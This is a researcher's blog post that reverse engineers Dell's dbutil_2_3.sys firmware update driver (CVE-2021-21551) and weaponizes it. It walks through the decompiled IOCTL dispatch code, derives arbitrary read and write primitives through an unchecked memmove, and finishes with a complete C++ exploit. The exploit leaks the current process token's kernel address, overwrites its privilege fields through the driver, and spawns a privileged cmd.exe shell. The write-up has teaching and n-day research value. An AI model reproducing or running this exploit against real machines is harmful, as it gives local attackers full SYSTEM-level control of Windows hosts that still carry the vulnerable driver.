Reverse Engineering & Exploiting Dell CVE-2021-21551
At the beginning of May 2021, Sentinel One disclosed five high-severity vulnerabilities in Dell’s firmware update driver.
As the described vulnerability did not appear too complicated to exploit, a lot of fellow security researchers started weaponizing it. I was one of the first, if not the first, to tweet about weaponizing it into a _SEP_TOKEN_PRIVILEGES overwrite exploit, and with this blog post I would like to write down my thought process when dealing with n-day exploit writing. It’s a didactic blog post, but keep in mind that I’ve already blogged about the following topics, so I will take them for granted as prerequisites; feel free to skip them if you are already familiar with them.
Pre-Requisites
- Windows Kernel Exploitation: Setting up the lab
  Setting up kernel debugging on different Windows flavours. As the blog post does not explicitly mention Windows 10, follow along the “More Windows Debuggee Flavours” paragraph.
- Windows Kernel Exploitation: Exploiting System Mechanic Driver
  If you are not familiar with concepts like DriverEntry, dispatch routines, the IRP_MJ_DEVICE_CONTROL major function code, IOCTL codes, and the _SEP_TOKEN_PRIVILEGES and EPROCESS structures, as well as their exploitation, I highly recommend reading this lengthy blog post.
Reverse Engineering
First of all, we need to recover a copy of the dbutil_2_3.sys driver mentioned by Sentinel One in their blog post. If you do not happen to have a Dell PC (which I was “lucky” enough to have), the best thing you can do is search for the original installer/driver on Dell’s website or, if you have a VirusTotal subscription, check whether anyone has uploaded the file.
I’ve also uploaded the dbutil_2_3.sys driver file, IDA’s DB and, of course, the exploit code to my GitHub repo.
dbutil_2_3.sys SHA1 C948AE14761095E4D76B55D9DE86412258BE7AFD
As always, we’ll start by loading the driver into our preferred disassembler, IDA in my case, and add the following needed structures if missing:
- DRIVER_OBJECT
- IRP
- IO_STACK_LOCATION
DriverEntry
IDA recognizes some basic functions, such as DriverEntry, from which we’ll start our analysis.
The DriverEntry function is pretty small and we can easily skip all of it up to the point where sub_11008 is called.
sub_11008
This function is very important as it sets up the DRIVER_OBJECT data structure, which holds information about the driver itself. Specifically, we are interested in the device name and symbolic link:
\\Device\\DBUtil_2_3
\\DosDevices\\DBUtil_2_3
There is a specific index inside the MajorFunction array, defined as IRP_MJ_DEVICE_CONTROL. At this index the driver stores the function pointer of the dispatch routine that is invoked whenever DeviceIoControl is called on the driver’s device. This API is very important because one of its arguments is a 32-bit integer known as the I/O control (IOCTL) code. The code is passed to the driver and makes it perform different actions depending on its value. Essentially, the dispatch routine at index IRP_MJ_DEVICE_CONTROL will, at some point in its code, act as a switch case.
In this case that happens in sub_11170.
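To make the 32-bit IOCTL value less opaque, here is a minimal sketch that splits a code into the four bit fields of the standard Windows CTL_CODE layout (device type, required access, function number, transfer method). The names IoctlFields and decode_ioctl are hypothetical helpers introduced only for illustration; they are not part of the driver or of the Windows headers.

```cpp
#include <cstdint>

// Bit fields of a Windows I/O control code (CTL_CODE layout).
struct IoctlFields {
    std::uint32_t device_type; // bits 31..16
    std::uint32_t access;      // bits 15..14 (0 = FILE_ANY_ACCESS)
    std::uint32_t function;    // bits 13..2
    std::uint32_t method;      // bits 1..0  (0 = METHOD_BUFFERED)
};

// Hypothetical helper: splits a raw IOCTL code into its fields.
constexpr IoctlFields decode_ioctl(std::uint32_t code) {
    return IoctlFields{
        (code >> 16) & 0xFFFFu,
        (code >> 14) & 0x3u,
        (code >> 2) & 0xFFFu,
        code & 0x3u,
    };
}
```

Decoding 0x9B0C1EC8 this way gives device type 0x9B0C, function 0x7B2, access 0 and method 0. Method 0 is METHOD_BUFFERED, which would be consistent with the dispatch routine reading its input from the IRP's system buffer.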
sub_11170
This function is pretty big but if we use the graph overview, we can see it acts as a switch case, selecting different values:
Here the “magic” happens and different IOCTL codes trigger different function calls.
As Sentinel One was very clear about the IOCTL code we should search for (0x9B0C1EC8), we can directly start disassembling this function and see where that specific IOCTL code is referenced.
Below you can find the decompiled code with comments:
__int64 __fastcall Driver_IRP_MJ_DEVICE_CONTROL(DEVICE_OBJECT *a1, IRP *a2)
{
  _IO_STACK_LOCATION *v2; // r8
  _QWORD **Src; // rdi
  NTSTATUS v4; // ebx
  ULONG v6; // ecx
  unsigned int IOCT_Code; // eax
  __int64 v8; // rdx
  _QWORD *v9; // r11
  __int64 *v10; // rdx
  _QWORD *v11; // r11
  _QWORD *v12; // r11
  _QWORD *v13; // rax
  _QWORD *v14; // rcx
  char v15; // dl
  NTSTATUS v16; // eax
  char v17; // dl
  _QWORD *v18; // r8
  _QWORD *v19; // rdx
  _QWORD *v20; // rax
  _QWORD *v21; // rcx
  _DWORD *v22; // rcx
  _QWORD *v24; // [rsp+20h] [rbp-78h]
  int BaseAddress; // [rsp+28h] [rbp-70h]
  SIZE_T NumberOfBytes; // [rsp+30h] [rbp-68h]
  __int64 Dst[8]; // [rsp+40h] [rbp-58h] BYREF
  char v28; // [rsp+80h] [rbp-18h]

  v2 = a2->Tail.Overlay.CurrentStackLocation;
  Src = (_QWORD **)a1->DeviceExtension;
  v4 = 0;
  *((_DWORD *)Src + 2) = 0;
  if ( v2->MajorFunction != 14 )
    goto LABEL_61;
  *Src = &a2->AssociatedIrp.MasterIrp->Type;
  v6 = v2->Parameters.Create.Options;
  *((_DWORD *)Src + 2) = v6;
  if ( v6 == v2->Parameters.Read.Length )
  {
    IOCT_Code = v2->Parameters.Read.ByteOffset.LowPart;
    v8 = 0x9B0C1F40i64;
    if ( IOCT_Code <= 0x9B0C1F40 )
    {
      if ( IOCT_Code != 0x9B0C1F40 )
      {
        if ( IOCT_Code == 0x9B0C1EC0 )
        {
          v16 = sub_51D4((__int64)Src);
        }
        else
        {
          if ( IOCT_Code == 0x9B0C1EC4 )
          {
            v15 = 1;
          }
          else
          {
            if ( IOCT_Code != 0x9B0C1EC8 ) // VULN FUNC HERE
            {
              switch ( IOCT_Code )
              {
                case 0x9B0C1ECC:
                  if ( v6 != 24 )
                    goto invalid_parameter;
                  v24 = (_QWORD *)**Src;
                  NumberOfBytes = (*Src)[2];
                  v13 = Src[2];
                  if ( !v13 || v13 == v24 )
                  {
                    MmFreeContiguousMemorySpecifyCache((PVOID)(*Src)[1], (unsigned int)NumberOfBytes, MmNonCached);
                    LODWORD(NumberOfBytes) = 0;
                    v14 = *Src;
                    *v14 = v24;
                    v14[1] = 0i64;
                    v14[2] = NumberOfBytes;
                    goto LABEL_61;
                  }
                  break;
                case 0x9B0C1F00:
                  if ( v6 != 72 )
                    goto invalid_parameter;
                  memmove(Dst, *Src, 0x48ui64);
                  v12 = Src[2];
                  if ( !v12 || v12 == (_QWORD *)Dst[0] )
                  {
                    memmove(Src + 11, Dst, 0x48ui64);
                    DeferredRoutine(0i64, Src, 0i64, 0i64);
                    memmove(Dst, Src + 11, 0x48ui64);
                    goto LABEL_23;
                  }
                  break;
                case 0x9B0C1F04:
                  if ( v6 != 72 )
                    goto invalid_parameter;
                  memmove(Dst, *Src, 0x48ui64);
                  v11 = Src[2];
                  if ( !v11 || v11 == (_QWORD *)Dst[0] )
                  {
                    v28 = 0;
                    memmove(Src + 11, Dst, 0x48ui64);
                    KeInsertQueueDpc((PRKDPC)(Src + 3), Src, Src);
LABEL_23:
                    v10 = Dst;
LABEL_18:
                    memmove(*Src, v10, 0x48ui64);
                    goto LABEL_61;
                  }
                  break;
                default:
                  if ( IOCT_Code != 0x9B0C1F08 || v6 != 0x48 )
                    goto invalid_parameter;
                  memmove(Dst, *Src, 0x48ui64);
                  v9 = Src[2];
                  if ( v9 && v9 != (_QWORD *)Dst[0] )
                    break;
                  v10 = (__int64 *)(Src + 11);
                  goto LABEL_18;
              }
access_violation:
              v4 = 0xC0000005; // STATUS_ACCESS_VIOLATION
              goto exit;
            }
            v15 = 0;
          }
          v16 = crash(Src, v15); // VULN FUNC HERE // Src = *ptr user_buffer // v8=0
        }
        goto LABEL_60;
      }
      v17 = 1;
      goto LABEL_59;
    }
    if ( IOCT_Code == 0x9B0C1F44 )
    {
      v17 = 0;
LABEL_59:
      v16 = sub_5100((__int64)Src, v17);
LABEL_60:
      v4 = v16;
      if ( v16 )
        goto exit;
      goto LABEL_61;
    }
    if ( IOCT_Code == 0x9B0C1F80 )
    {
      LOBYTE(v2) = 1;
    }
    else
    {
      if ( IOCT_Code != 0x9B0C1F84 )
      {
        if ( IOCT_Code == 0x9B0C1F88 )
        {
          LOBYTE(v2) = 1;
          LOBYTE(v8) = 1;
        }
        else
        {
          if ( IOCT_Code != 0x9B0C1F8C )
          {
            if ( IOCT_Code == 0x9B0C1FC0 )
            {
              if ( v6 != 12 )
                goto invalid_parameter;
              v22 = *Src;
              BaseAddress = *((_DWORD *)*Src + 2);
              LOBYTE(BaseAddress) = Src[2] != 0i64;
              *(_QWORD *)v22 = 0x300000002i64;
              v22[2] = BaseAddress;
            }
            else
            {
              if ( IOCT_Code != 0x9B0C1FC4 || v6 != 8 )
                goto invalid_parameter;
              v18 = *Src;
              v19 = Src[2];
              v20 = (_QWORD *)**Src;
              if ( v19 && v19 != v20 )
                goto access_violation;
              v21 = 0i64;
              if ( !v19 )
                v21 = (_QWORD *)**Src;
              Src[2] = v21;
              *v18 = v20;
            }
LABEL_61:
            a2->IoStatus.Information = *((unsigned int *)Src + 2);
            goto exit;
          }
          v2 = 0i64;
          LOBYTE(v8) = 1;
        }
        goto LABEL_53;
      }
      v2 = 0i64;
    }
    v8 = 0i64;
LABEL_53:
    v16 = sub_5008(Src, v8, v2);
    goto LABEL_60;
  }
invalid_parameter:
  v4 = 0xC000000D; // STATUS_INVALID_PARAMETER
exit:
  a2->IoStatus.Status = v4;
  IofCompleteRequest(a2, 0);
  return (unsigned int)v4;
}
We can see that once our IOCTL code has been found, a jump happens, bringing us to sub_15294 (renamed crash in the decompiled listing above).
cmp eax, 9B0C1EC8h
.text:00000000000111F5 jz loc_113A0
Arbitrary Write
This function, sub_15294 (dbutil_2_3+0x5294), once decompiled is pretty easy to understand:
__int64 __fastcall crash(__int64 **userBuffer, char a2)
{
  _QWORD; // rbx
  _DWORD ecx1; // ecx
  __int64 result; // rax
  _QWORD r9_3; // r9
  _QWORD rax3; // rax
  _DWORD Size; // eax
  _QWORD Dest; // rcx
  _QWORD Src; // rdx
  _QWORD rcx9; // rcx
  _QWORD field1; // [rsp+20h] [rbp-28h]
  _QWORD field2; // [rsp+28h] [rbp-20h]
  _QWORD field3; // [rsp+30h] [rbp-18h]

  ecx1 = *((_DWORD *)userBuffer + 2);
  if ( ecx1 < 24 )
    return 0xC000000Di64; // STATUS_INVALID_PARAMETER
  r9_3 = *userBuffer;
  field1 = **userBuffer;
  field2 = (*userBuffer)[1];
  field3 = (*userBuffer)[2];
  rax3 = userBuffer[2];
  if ( rax3 && rax3 != (__int64 *)field1 )
    return 0xC0000005i64; // STATUS_ACCESS_VIOLATION
  Size = ecx1 - 24;
  Dest = (void *)(field2 + (unsigned int)field3);
  if ( a2 )
  {
    Src = (const void *)(field2 + (unsigned int)field3);
    Dest = r9_3 + 3;
  }
  else
  {
    Src = r9_3 + 3;
  }
  memmove(Dest, Src, Size);
  rcx9 = *userBuffer;
  *rcx9 = field1;
  rcx9[1] = field2;
  rcx9[2] = field3;
  return 0i64;
}
We expect the vulnerability to lie in the memmove at dbutil_2_3+0x5301. memmove is defined as follows:
void * memmove ( void * destination, const void * source, size_t num );
memmove copies num bytes from the location pointed by source to the memory block pointed by destination. Copying takes place as if an intermediate buffer were used, allowing the destination and source to overlap. - cplusplus.com
memmove is a perfect candidate for our write-what-where exploit as it gives us a vanilla arbitrary write primitive; we just need to check which parameters we control and whether there are any constraints.
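As a quick refresher on the overlap guarantee quoted above, the following minimal sketch copies a range onto itself with an offset. shift_right is a hypothetical helper written only for this illustration; it has nothing to do with the driver.

```cpp
#include <cstring>
#include <string>

// Copies the first `count` bytes of `text` to position `shift`, in place.
// Source and destination ranges overlap, which memmove is defined to handle.
std::string shift_right(std::string text, std::size_t count, std::size_t shift) {
    if (count + shift > text.size()) {
        return text; // refuse copies that would run past the end of the string
    }
    std::memmove(&text[shift], &text[0], count);
    return text;
}
```

For instance, shift_right("abcdef", 4, 2) yields "ababcd": the four bytes "abcd" land at offset 2 even though the two ranges share bytes.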
Constraint 1
Looking at the very beginning of our decompiled function, we can clearly see that the ECX register value is compared with the value 24 (0x18). Using a debugger, we can check what’s in the ECX register: it contains the size of the user buffer. If the user’s buffer size is less than 24, as visible in the branch, we’ll hit the return 0xC000000D, i.e. NTSTATUS STATUS_INVALID_PARAMETER.
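The check can be modelled in a few lines. This is only a sketch of the logic visible in the decompiled routine (the comparison against 24 and the later Size = ecx1 - 24); LengthCheck and check_input_length are hypothetical names, and the status constants are simply the values shown in the listing.

```cpp
#include <cstdint>

constexpr std::uint32_t kStatusSuccess = 0x00000000u;
constexpr std::uint32_t kStatusInvalidParameter = 0xC000000Du;
constexpr std::uint32_t kHeaderSize = 24; // three 8-byte fields

struct LengthCheck {
    std::uint32_t status;    // status the routine would return at this point
    std::uint32_t copy_size; // number of bytes later handed to memmove
};

// Hypothetical model of the length check at the top of the routine.
constexpr LengthCheck check_input_length(std::uint32_t input_length) {
    return input_length < kHeaderSize
        ? LengthCheck{kStatusInvalidParameter, 0}
        : LengthCheck{kStatusSuccess, input_length - kHeaderSize};
}
```

Note that a buffer of exactly 24 bytes passes the check but leaves zero bytes to copy, so a useful request needs at least one more field after the first three.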
Constraint 2
When using IOCTLpus I usually split each field of the user buffer in half; that way, if the x64 code uses only half of a field, it is easier to determine which field, and which half of it, is being used.
User Buffer:
---------------------------------
        Second half | First Half (little-endian)
field1: 41 41 41 41 | 42 42 42 42
field2: 43 43 43 43 | 44 44 44 44
field3: 45 45 45 45 | 46 46 46 46
field4: 47 47 47 47 | 48 48 48 48
Putting a breakpoint on the memmove at dbutil_2_3+0x5301 and analysing the parameters being passed, I discovered an interesting thing.
First of all, we should remember that on x86_64 the fastcall calling convention is used; the memmove parameters will be passed in the RCX, RDX and R8 registers:
- RCX: destination
- RDX: source
- R8: size
Once we hit the breakpoint, we can see the following values populating the registers:
- RCX: 0x4444444488888888
- RDX: 0x4848484847474747
- R8: 0x20
Our destination address was mangled, as the lower 32 bits of the third field of the user buffer (its second half in the layout above) get added to the destination address: 0x43434343 + 0x45454545 = 0x88888888.
This can be seen from the raw assembly in the routine:
PAGE:00000000000152E4 mov ecx, dword ptr [rsp+48h+var_18]
PAGE:00000000000152E8 add rcx, [rsp+48h+var_20] ; Dst
Fortunately, by setting the entire third field to 0x0 we can “bypass” this address mangling.
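The address computation performed by the two instructions above can be reproduced in user space. The sketch below assumes the semantics read from the decompiled code (field2 + (unsigned int)field3); effective_address is a hypothetical name used only here.

```cpp
#include <cstdint>

// Mirrors "mov ecx, dword ptr [field3]; add rcx, [field2]":
// only the low 32 bits of field3 are added to the 64-bit field2.
constexpr std::uint64_t effective_address(std::uint64_t field2, std::uint64_t field3) {
    return field2 + static_cast<std::uint32_t>(field3);
}
```

With the test pattern used above, effective_address(0x4444444443434343, 0x4646464645454545) gives 0x4444444488888888, matching the RCX value seen in the debugger, while a zeroed third field leaves the address untouched.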
Recap
We need to set up a user buffer of at least four fields. With exactly three fields nothing is left for the memmove to copy, and with fewer the request will not even pass the check on the user buffer’s length:
- Field 1: can be set to whatever value we want.
- Field 2: must be set to the address of the memmove’s destination.
- Field 3: must be set to 0x0, otherwise its lower half will be added to the memmove’s destination, mangling the address.
- Field 4: must be set to the value we want to write at the memmove’s destination.
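The recap can be exercised without touching the driver by modelling the write path in user space. This is a simplified sketch based on the decompiled routine, not the driver's code: Request and model_write are hypothetical names, the target is an ordinary user-mode address, and the extra check against the value stored in the device extension is left out.

```cpp
#include <cstdint>
#include <cstring>

// Hypothetical mirror of the four-field request described above.
struct Request {
    std::uint64_t field1; // ignored by the copy
    std::uint64_t field2; // address to write to
    std::uint64_t field3; // offset; only the low 32 bits are used, keep at 0
    std::uint64_t field4; // value to write
};
static_assert(sizeof(Request) == 32, "four 8-byte fields expected");

// User-space model of the write path (second argument == 0 in the routine).
// Returns false where the driver would return STATUS_INVALID_PARAMETER.
bool model_write(const void* input, std::uint32_t length) {
    if (length < 24) {
        return false;
    }
    const auto* bytes = static_cast<const unsigned char*>(input);
    std::uint64_t field2 = 0;
    std::uint64_t field3 = 0;
    std::memcpy(&field2, bytes + 8, sizeof field2);
    std::memcpy(&field3, bytes + 16, sizeof field3);
    // Destination = field2 + low 32 bits of field3; source = data after field3.
    auto* dest = reinterpret_cast<void*>(
        static_cast<std::uintptr_t>(field2 + static_cast<std::uint32_t>(field3)));
    std::memmove(dest, bytes + 24, length - 24);
    return true;
}
```

Filling field2 with the address of a local 64-bit variable and field4 with 0xffffffffffffffff, then calling model_write(&req, sizeof req), overwrites that variable, which is the same data flow the real request drives inside the kernel.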
Arbitrary Read
A bit more reverse engineering lets us discover the IOCTL code 0x9B0C1EC4 in sub_11170.
Despite being a completely different IOCTL code, analysing the code we can see that it ends up in the same routine. The only difference is that this time the v14 parameter (v15 in the full listing above) has been set to 1.
if ( IOCT_Code == 0x9B0C1EC4 )
{
  v14 = 1;
}
[--SNIP--]
v15 = sub_15294(Src, v14);
As this time the v14 parameter is non-zero, the execution flow changes in sub_15294; specifically, this check swaps the pointers later used by the memmove.
if ( a2 )
{
  v9 = (const void *)(v12 + (unsigned int)v13);
  v8 = v5 + 3;
}
[--SNIP--]
memmove(v8, v9, v7);
This time, in fact, the call to memmove has an interesting twist: the address built from the second field of the user buffer (v9, Src in the full listing above), instead of being used as the destination, is used as the source. The destination is the remainder of the user buffer, starting at the fourth field (v5 + 3).
Please note: as we control every parameter of the memmove, there is no real limit to the amount of data we can transfer. We read/write only one “pointer” (ULONG_PTR size) at a time simply to keep our primitive simple.
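The read direction, including the point about transferring more than one pointer at a time, can be modelled in user space as well. As before, this is a sketch under stated assumptions: model_read is a hypothetical name, it works on ordinary user-mode memory, and it only reproduces the data flow read from the decompiled routine when its second argument is 1.

```cpp
#include <cstdint>
#include <cstring>
#include <vector>

// User-space model of the read path: returns `size` bytes found at `address`.
std::vector<unsigned char> model_read(std::uint64_t address, std::uint32_t size) {
    // Request layout: three 8-byte header fields, then `size` bytes of room.
    std::vector<unsigned char> request(24 + static_cast<std::size_t>(size), 0);
    std::memcpy(request.data() + 8, &address, sizeof address); // field 2 = source
    // Field 3 stays zero so that no offset is added to the address.

    // What the routine does with the request when its flag is set:
    std::uint64_t field2 = 0;
    std::uint64_t field3 = 0;
    std::memcpy(&field2, request.data() + 8, sizeof field2);
    std::memcpy(&field3, request.data() + 16, sizeof field3);
    const auto* src = reinterpret_cast<const void*>(
        static_cast<std::uintptr_t>(field2 + static_cast<std::uint32_t>(field3)));
    std::memmove(request.data() + 24, src, request.size() - 24);

    // The data read starts right after the three header fields.
    return std::vector<unsigned char>(request.begin() + 24, request.end());
}
```

The amount of data returned depends only on how much room follows the three header fields, so a larger request buffer reads a larger region in a single call.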
_SEP_TOKEN_PRIVILEGES Overwrite Exploit Code
/*
Exploit title: DELL dbutil_2_3.sys v. <= 2.3 - Arbitrary Write to Local Privilege Escalation (LPE)
Exploit Authors: Paolo Stagno aka VoidSec - voidsec@voidsec.com - https://voidsec.com
CVE: CVE-2021-21551
Date: 10/05/2021
Version: v.2.3
Tested on: Windows 10 Pro x64 v.1903 Build 18362.30
Category: local exploit
Platform: windows

“I believe cats to be spirits come to earth. A cat, I am sure, could walk on a cloud without coming through.” - Jules Verne
*/

#include <iostream>
#include <cstdint>
#include <windows.h>
#include <winternl.h>
#include <tlhelp32.h>
#include <algorithm>

#define IOCTL_CODE 0x9B0C1EC8 // IOCTL_CODE value, used to reach the vulnerable function (taken from IDA)
#define SystemHandleInformation 0x10
#define SystemHandleInformationSize (1024 * 1024 * 2)

// define the buffer structure which will be sent to the vulnerable driver
struct Exploit
{
    uint64_t Field1; // "padding" can be anything
    void* Field2;    // where to write
    uint64_t Field3; // must be 0
    uint64_t Field4; // value to write
};

struct outBuffer
{
    uint64_t Field1;
    uint64_t Field2;
    uint64_t Field3;
    uint64_t Field4;
};

// define a pointer to the native function 'NtQuerySystemInformation'
using pNtQuerySystemInformation = NTSTATUS(WINAPI*)(
    ULONG SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength);

// define the SYSTEM_HANDLE_TABLE_ENTRY_INFO structure
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
{
    USHORT UniqueProcessId;
    USHORT CreatorBackTraceIndex;
    UCHAR ObjectTypeIndex;
    UCHAR HandleAttributes;
    USHORT HandleValue;
    PVOID Object;
    ULONG GrantedAccess;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO;

// define the SYSTEM_HANDLE_INFORMATION structure
typedef struct _SYSTEM_HANDLE_INFORMATION
{
    ULONG NumberOfHandles;
    SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;

int main(int argc, char** argv)
{
    // open a handle to the device exposed by the driver - symlink is \\.\\DBUtil_2_3
    HANDLE device = ::CreateFileW(
        L"\\\\.\\DBUtil_2_3",
        GENERIC_WRITE | GENERIC_READ,
        0,
        nullptr,
        OPEN_EXISTING,
        0,
        NULL);
    if (device == INVALID_HANDLE_VALUE)
    {
        std::cout << "[!] Couldn't open handle to DBUtil_2_3 driver. Error code: " << ::GetLastError() << std::endl;
        return -1;
    }
    std::cout << "[+] Opened a handle to DBUtil_2_3 driver!\n";

    // resolve the address of NtQuerySystemInformation and assign it to a function pointer
    pNtQuerySystemInformation NtQuerySystemInformation = (pNtQuerySystemInformation)::GetProcAddress(::LoadLibraryW(L"ntdll"), "NtQuerySystemInformation");
    if (!NtQuerySystemInformation)
    {
        std::cout << "[!] Couldn't resolve NtQuerySystemInformation API. Error code: " << ::GetLastError() << std::endl;
        return -1;
    }
    std::cout << "[+] Resolved NtQuerySystemInformation!\n";

    // open the current process token - it will be used to retrieve its kernelspace address later
    HANDLE currentProcess = ::GetCurrentProcess();
    HANDLE currentToken = NULL;
    bool success = ::OpenProcessToken(currentProcess, TOKEN_ALL_ACCESS, &currentToken);
    if (!success)
    {
        std::cout << "[!] Couldn't open handle to the current process token. Error code: " << ::GetLastError() << std::endl;
        return -1;
    }
    std::cout << "[+] Opened a handle to the current process token!\n";

    // allocate space in the heap for the handle table information which will be filled by the call to 'NtQuerySystemInformation' API
    PSYSTEM_HANDLE_INFORMATION handleTableInformation = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(::GetProcessHeap(), HEAP_ZERO_MEMORY, SystemHandleInformationSize);

    // call NtQuerySystemInformation and fill the handleTableInformation structure
    ULONG returnLength = 0;
    NtQuerySystemInformation(SystemHandleInformation, handleTableInformation, SystemHandleInformationSize, &returnLength);

    uint64_t tokenAddress = 0;
    // iterate over the system's handle table and look for the handles belonging to our process
    for (ULONG i = 0; i < handleTableInformation->NumberOfHandles; i++)
    {
        SYSTEM_HANDLE_TABLE_ENTRY_INFO handleInfo = (SYSTEM_HANDLE_TABLE_ENTRY_INFO)handleTableInformation->Handles[i];
        // if it finds our process and the handle matches the current token handle we already opened, print it
        if (handleInfo.UniqueProcessId == ::GetCurrentProcessId() && handleInfo.HandleValue == (USHORT)(ULONG_PTR)currentToken)
        {
            tokenAddress = (uint64_t)handleInfo.Object;
            std::cout << "[+] Current token address in kernelspace is at: 0x" << std::hex << tokenAddress << std::endl;
        }
    }
    // stop here if the token was not found: writing relative to address 0 would crash the machine
    if (!tokenAddress)
    {
        std::cout << "[!] Couldn't find the current token address in the handle table.\n";
        return -1;
    }

    outBuffer buffer = { 0, 0, 0, 0 };

    /*
    dt nt!_SEP_TOKEN_PRIVILEGES
       +0x000 Present          : Uint8B
       +0x008 Enabled          : Uint8B
       +0x010 EnabledByDefault : Uint8B

    The structure is addressed at offset 0x40 of the token in the writes below.
    */

    // overwrite the _SEP_TOKEN_PRIVILEGES "Present" field in the current process token
    Exploit exploit = { 0x4141414142424242, (void*)(tokenAddress + 0x40), 0x0000000000000000, 0xffffffffffffffff };
    // overwrite the _SEP_TOKEN_PRIVILEGES "Enabled" field in the current process token
    Exploit exploit2 = { 0x4141414142424242, (void*)(tokenAddress + 0x48), 0x0000000000000000, 0xffffffffffffffff };
    // overwrite the _SEP_TOKEN_PRIVILEGES "EnabledByDefault" field in the current process token
    Exploit exploit3 = { 0x4141414142424242, (void*)(tokenAddress + 0x50), 0x0000000000000000, 0xffffffffffffffff };

    DWORD bytesReturned = 0;
    success = DeviceIoControl(
        device,
        IOCTL_CODE,
        &exploit,
        sizeof(exploit),
        &buffer,
        sizeof(buffer),
        &bytesReturned,
        nullptr);
    if (!success)
    {
        std::cout << "[!] Couldn't overwrite current token 'Present' field. Error code: " << ::GetLastError() << std::endl;
        return -1;
    }
    std::cout << "[+] Successfully overwritten current token 'Present' field!\n";

    success = DeviceIoControl(
        device,
        IOCTL_CODE,
        &exploit2,
        sizeof(exploit2),
        &buffer,
        sizeof(buffer),
        &bytesReturned,
        nullptr);
    if (!success)
    {
        std::cout << "[!] Couldn't overwrite current token 'Enabled' field. Error code: " << ::GetLastError() << std::endl;
        return -1;
    }
    std::cout << "[+] Successfully overwritten current token 'Enabled' field!\n";

    success = DeviceIoControl(
        device,
        IOCTL_CODE,
        &exploit3,
        sizeof(exploit3),
        &buffer,
        sizeof(buffer),
        &bytesReturned,
        nullptr);
    if (!success)
    {
        std::cout << "[!] Couldn't overwrite current token 'EnabledByDefault' field. Error code: " << ::GetLastError() << std::endl;
        return -1;
    }
    std::cout << "[+] Successfully overwritten current token 'EnabledByDefault' field!\n";
    std::cout << "[+] Token privileges successfully overwritten!\n";
    std::cout << "[+] Spawning a new shell with full privileges!\n";

    system("cmd.exe");
    return 0;
}
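The three target addresses used by the exploit follow directly from the token address and the structure layout quoted in its comment. The sketch below only restates that arithmetic; PrivilegeTargets and privilege_targets are hypothetical names, and the 0x40 offset is the value used in the exploit for the tested build (Windows 10 1903), which should be assumed to differ on other builds.

```cpp
#include <cstdint>

// Offset of the privileges structure inside the token, as used in the exploit
// for the tested build; treat it as build-specific.
constexpr std::uint64_t kTokenPrivilegesOffset = 0x40;

struct PrivilegeTargets {
    std::uint64_t present;            // _SEP_TOKEN_PRIVILEGES +0x000
    std::uint64_t enabled;            // _SEP_TOKEN_PRIVILEGES +0x008
    std::uint64_t enabled_by_default; // _SEP_TOKEN_PRIVILEGES +0x010
};

// Hypothetical helper: computes the three addresses to overwrite.
constexpr PrivilegeTargets privilege_targets(std::uint64_t token_address) {
    return PrivilegeTargets{
        token_address + kTokenPrivilegesOffset + 0x00,
        token_address + kTokenPrivilegesOffset + 0x08,
        token_address + kTokenPrivilegesOffset + 0x10,
    };
}
```

Each address is then used as the second field of one write request, with the fourth field set to 0xffffffffffffffff.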